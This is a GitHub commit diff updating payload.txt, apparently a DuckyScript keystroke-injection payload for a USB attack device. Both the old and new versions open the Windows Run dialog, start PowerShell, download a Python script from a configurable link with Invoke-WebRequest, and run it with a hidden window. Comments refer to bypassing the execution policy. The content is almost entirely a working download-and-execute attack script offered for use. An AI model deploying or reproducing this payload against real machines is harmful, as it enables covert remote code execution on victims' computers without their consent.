Update payload.txt

pull/157/head
Kalani Helekunihi 2023-06-12 14:28:10 -04:00 committed by GitHub
parent fa89b5dbe7
commit 9d4361fd01
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 4 additions and 12 deletions

View File

@ -16,21 +16,13 @@ REM - ExecutionPolicy Bypass
REM REQUIRED - Set your Python script link REM REQUIRED - Set your Python script link
DEFINE SCRIPT-PY-LINK example.com DEFINE #SCRIPT-PY-LINK example.com
DEFAULT_DELAY 500
DELAY 1000
GUI r GUI r
DELAY 500 STRINGLN powershell
STRING powershell
ENTER
DELAY 500
STRING Invoke-WebRequest -Uri " STRINGLN Invoke-WebRequest -Uri "#SCRIPT-PY-LINK" -OutFile "script.py"
STRING SCRIPT-PY-LINK
STRING " -OutFile "script.py"
ENTER
DELAY 500
STRINGLN Start-Process python.exe -ArgumentList "script.py" -WindowStyle Hidden STRINGLN Start-Process python.exe -ArgumentList "script.py" -WindowStyle Hidden
DELAY 1000 DELAY 1000